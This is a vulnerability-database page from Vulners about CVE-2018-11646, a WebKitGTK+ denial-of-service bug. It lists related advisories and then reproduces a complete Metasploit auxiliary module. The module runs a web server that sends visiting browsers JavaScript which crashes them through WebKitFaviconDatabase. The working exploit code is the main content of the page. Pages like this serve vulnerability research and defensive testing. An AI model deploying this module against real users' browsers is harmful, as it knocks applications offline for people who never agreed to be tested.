Vulners
Lucene search
WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)
| Reporter | Title | Published | Views | Family All 50 |
|---|---|---|---|---|
 | WebKitGTK+ < 2.21.3 - pageURL Mishandling Crash (PoC) Exploit | 6 Jun 201800:00 | – | zdt |
| WebKitGTK+ < 2.21.3 - #WebKitFaviconDatabase DoS Exploit | 11 Jun 201800:00 | – | zdt |
 | CVE-2018-11646 | 21 Jun 201821:37 | – | circl |
 | Apple Safari Technology Preview WebKit Denial of Service Vulnerability (CNVD-2018-11311) | 5 Jun 201800:00 | – | cnvd |
 | CVE-2018-11646 | 1 Jun 201813:00 | – | cve |
 | CVE-2018-11646 | 1 Jun 201813:00 | – | cvelist |
 | CVE-2018-11646 | 1 Jun 201813:00 | – | debiancve |
 | WebKitGTK+ < 2.21.3 - Crash (PoC) | 5 Jun 201800:00 | – | exploitdb |
 | WebKitGTK+ 2.21.3 - WebKitFaviconDatabase Denial of Service (Metasploit) | 11 Jun 201800:00 | – | exploitpack |
| WebKitGTK+ 2.21.3 - Crash (PoC) | 5 Jun 201800:00 | – | exploitpack |
10
##
# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS
# Author: Dhiraj Mishra
# Date: 2018-06-11
# CVE: 2018-11646
#
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS",
'Description' => %q(
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
If successful, it could lead to application crash, resulting in denial of service.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra', # Original discovery, disclosure
'Hardik Mehta', # Original discovery, disclosure
'Zubin Devnani', # Original discovery, disclosure
'Manuel Caballero' #JS Code
],
'References' => [
['EDB', '44842'],
['CVE', '2018-11646'],
['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
],
'DisclosureDate' => 'Jun 03 2018',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = <<-JS
<script type="text/javascript">
win = window.open("WIN", "WIN");
window.open("http://example.com/", "WIN");
win.document.execCommand('stop');
win.document.write("HelloWorld");
win.document.close();
</script>
JS
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jun 2018 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 25
CVSS 37.5
EPSS0.75346